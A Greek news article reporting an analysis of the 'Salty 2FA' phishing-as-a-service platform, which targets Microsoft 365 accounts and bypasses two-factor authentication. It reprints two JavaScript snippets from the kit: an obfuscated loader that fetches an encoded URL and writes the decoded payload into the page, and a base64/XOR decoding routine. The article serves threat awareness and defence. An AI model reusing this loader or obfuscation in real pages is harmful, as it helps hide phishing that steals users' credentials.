Μια νέα εξελιγμένη πλατφόρμα Phishing-as-a-Service (PhaaS) με την ονομασία “Salty 2FA” έχει αναδειχθεί ως σημαντική απειλή για τους χρήστες του Microsoft 365 σε βιομηχανίες των ΗΠΑ και της Ευρώπης.

H πλατφόρμα χρησιμοποιεί προηγμένες τεχνικές απόκρυψης και αλυσίδες επίθεσης πολλαπλών σταδίων, σχεδιασμένες ειδικά για να παρακάμπτουν τους μηχανισμούς ελέγχου ταυτότητας δύο παραγόντων, ενώ κλέβουν εταιρικά διαπιστευτήρια.
Η πλατφόρμα διεξάγει προσεκτικά σχεδιασμένες εκστρατείες phishing και στοχεύει οργανισμούς σε διάφορους τομείς: χρηματοοικονομικά, τηλεπικοινωνίες, ενέργεια, εφοδιαστική αλυσίδα και εκπαίδευση.
Δείτε επίσης: Phishing: Διανομή Noodlophile malware με νέα “δολώματα”
Το κακόβουλο λογισμικό, που χρησιμοποιείται, ξεχωρίζει μέσω ενός μοναδικού domain infrastructure pattern που συνδυάζει domains σε “.com” zones με ρωσικά “.ru” top-level domains. Αυτός ο συνδυασμός δημιουργεί ένα περίπλοκο δίκτυο ανακατευθύνσεων και μηχανισμών παράδοσης φορτίων που βοηθούν στην αποφυγή των παραδοσιακών συστημάτων ανίχνευσης.
Salty 2FA: Πώς λειτουργούν οι phishing επιθέσεις
Τα θύματα λαμβάνουν phishing emails που περιέχουν διάφορα δολώματα, συμπεριλαμβανομένων ψεύτικων φωνητικών μηνυμάτων, αιτημάτων πρόσβασης σε έγγραφα κλπ, που τους ανακατευθύνουν σε φαινομενικά νόμιμες σελίδες σύνδεσης της Microsoft.

Οι αναλυτές της ANY.RUN εντόπισαν αυτή την άγνωστη πλατφόρμα PhaaS κατά τη διάρκεια αναζήτησης εκστρατειών phishing. Έτσι, ανακάλυψαν πολλαπλά sandbox sessions, που παρουσίαζαν παρόμοια μοτίβα συμπεριφοράς παρά τη χρήση διαφορετικών domains και τεχνικών απόκρυψης. Η συνεπής χρήση της προστασίας Cloudflare Turnstile σε συνδυασμό με το domain pairing (που αναφέρθηκε παραπάνω) αρχικά επισήμανε αυτές τις εκστρατείες ως πιθανώς σχετιζόμενες, οδηγώντας στην εκτενή ανάλυση που αποκάλυψε τις πλήρεις δυνατότητες του Salty 2FA.
Η phishing πλατφόρμα μπορεί να αναχαιτίζει και να επεξεργάζεται πολλαπλές μεθόδους ταυτοποίησης δύο παραγόντων, συμπεριλαμβανομένων ειδοποιήσεων push, κωδικών SMS, φωνητικών κλήσεων και εφαρμογών αυθεντικοποίησης. Αυτή η δυνατότητα επεκτείνει την επίθεση πέρα από την απλή κλοπή διαπιστευτηρίων, επιτρέποντας στους κακόβουλους χρήστες να διατηρούν συνεχή πρόσβαση σε παραβιασμένους λογαριασμούς ακόμα και όταν οι παραδοσιακές προστασίες 2FA είναι σε ισχύ.
Δείτε επίσης: Βρετανός φοιτητής καταδικάστηκε για πώληση phishing kits
Salty 2FA: Αλυσίδα Εκτέλεσης Πολλαπλών Σταδίων και Τεχνικές Απόκρυψης
Η τεχνική αρχιτεκτονική του Salty 2FA βασίζεται σε μια προσεκτικά οργανωμένη διαδικασία εκτέλεσης πέντε σταδίων, σχεδιασμένη να αντιστέκεται στην ανάλυση και την ανίχνευση:
- Η διαδικασία ξεκινά με ένα obfuscated JavaScript function που λειτουργεί ως σημείο εισόδου, περιέχοντας διάφορα σχόλια για να περιπλέξουν την στατική ανάλυση.
async function vitals() {
function whiz (math) {
return [...atob (math)].map((lewd, matchmaking, recklessness) =>
recklessness[0] ? String.fromCharCode((lewd.charCodeAt(0)-
recklessness[0].charCodeAt(0)+256)%256):"").join("");
}
if(sessionStorage[0]){
document.write(whiz(sessionStorage[0]));
return;
}
unearned = await(await fetch(await whiz(`1PwICAQHzsPDAfUG//kIBAD19/nGyPn9wgYJw8M=`))).text();
document.write(await whiz(unearned));
sessionStorage[0] = unearned;
}- Η πλατφόρμα χρησιμοποιεί εξελιγμένο element ID encoding χρησιμοποιώντας λειτουργίες Base64 και XOR με μια σταθερή παραγόμενη τιμή, καθιστώντας τη δυναμική ανάλυση σημαντικά πιο δύσκολη.
- Το front-end logic βασίζεται σε jQuery calls σε dynamically generated element identifiers, τα οποία πρέπει να αποκωδικοποιηθούν μέσω μιας ειδικής διαδικασίας πριν το manipulation.
function decode(s) {
try {
var r = '';
r = atob(s);
var d = '';
for (var i = 0; i < r.length; i++) {
d += String.fromCharCode(r.charCodeAt(i) ^
'b03e37d4502862adc85953d8ea0c4b6a'.charCodeAt(i %
'b03e37d4502862adc85953d8ea0c4b6a'.length));
}
return d;
} catch (e) {
return s;
}
}- Η πλατφόρμα ενσωματώνει πολλαπλούς μηχανισμούς αντι-ανάλυσης, συμπεριλαμβανομένου του αποκλεισμού συντομεύσεων πληκτρολογίου για debugging tools και execution time measurement για την ανίχνευση ελεγχόμενων περιβαλλόντων.
- Η εξαγωγή δεδομένων χρησιμοποιεί την ίδια τεχνική XOR με session-derived keys, ενώ τα κλεμμένα διαπιστευτήρια μεταδίδονται σε διακομιστές φιλοξενούμενους στη Ρωσία μέσω encoded POST requests που περιέχουν τόσο τα κρυπτογραφημένα δεδομένα όσο και τις παραμέτρους αποκωδικοποίησης.
Δείτε επίσης: Google Gemini: Πώς οι περιλήψεις email οδηγούν σε phishing επιθέσεις;
Η εμφάνιση του Salty 2FA επιβεβαιώνει ότι οι παραδοσιακές άμυνες, όπως η πιστοποίηση πολλαπλών παραγόντων (MFA/2FA), δεν αποτελούν πλέον «αδιαπέραστο τείχος» για τους κυβερνοεγκληματίες. Αντίθετα, οι πλατφόρμες PhaaS, αξιοποιώντας αυτοματοποιημένα εργαλεία και σύνθετες μεθόδους απόκρυψης, καταφέρνουν να μιμούνται τέλεια τα περιβάλλοντα των θυμάτων και να υποκλέπτουν όχι μόνο κωδικούς πρόσβασης, αλλά και δεύτερα επίπεδα ταυτοποίησης.
Αυτό είναι ιδιαίτερα ανησυχητικό για εταιρικά περιβάλλοντα όπου το Microsoft 365 αποτελεί βασικό εργαλείο παραγωγικότητας. Μια επιτυχημένη παραβίαση μπορεί να οδηγήσει σε διαρροή ευαίσθητων δεδομένων, παραβίαση αλληλογραφίας υψηλού επιπέδου, ακόμα και σε supply chain attacks, αν ο επιτιθέμενος αποκτήσει πρόσβαση σε συνεργαζόμενους οργανισμούς.
Δείτε επίσης: Χάκερ εκμεταλλεύονται υπηρεσίες link-wrapping για να κλέψουν στοιχεία σύνδεσης του Microsoft 365
🔑 Ασφαλίστε τους κωδικούς σας με Proton Pass
Password manager από την Proton — end-to-end κρυπτογράφηση, passkeys, ενσωματωμένο 2FA και παρακολούθηση για διαρροές των στοιχείων σας.
- ✔ Κρυπτογραφημένη αποθήκευση κωδικών & passkeys
- ✔ Ειδοποίηση αν κάποιος κωδικός σας διέρρευσε (Dark Web Monitoring)
- ✔ Δωρεάν έκδοση — σε όλες τις συσκευές
Ο σύνδεσμος είναι συνεργατικός (affiliate) — το SecNews ενδέχεται να λάβει προμήθεια χωρίς επιπλέον κόστος για εσάς. Δεν επηρεάζει την ανεξαρτησία της αρθρογραφίας μας.

Ενδεικτικό της «βιομηχανοποίησης» του κυβερνοεγκλήματος είναι η διάθεση του Salty 2FA ως υπηρεσία. Αυτό σημαίνει ότι ακόμα και κυβερνοεγκληματίες χωρίς εξειδικευμένες τεχνικές γνώσεις μπορούν να νοικιάσουν ή να αγοράσουν πρόσβαση στην πλατφόρμα και να διεξάγουν εκστρατείες phishing με επαγγελματική ποιότητα. Η ύπαρξη σταδίων anti-analysis και advanced encoding δείχνει πως δεν μιλάμε για ένα απλό script, αλλά για μια ολόκληρη κακόβουλη υποδομή σχεδιασμένη για μακροχρόνια επιβίωση.
Για την αντιμετώπιση τέτοιων επιθέσεων, οι οργανισμοί πρέπει να κινηθούν πέρα από το παραδοσιακό 2FA, υιοθετώντας προηγμένες μεθόδους ταυτοποίησης χωρίς κωδικούς (passwordless authentication), αλλά και συστήματα ανίχνευσης ανωμαλιών που εστιάζουν στη συμπεριφορά του χρήστη και όχι μόνο στην ορθότητα των credentials.
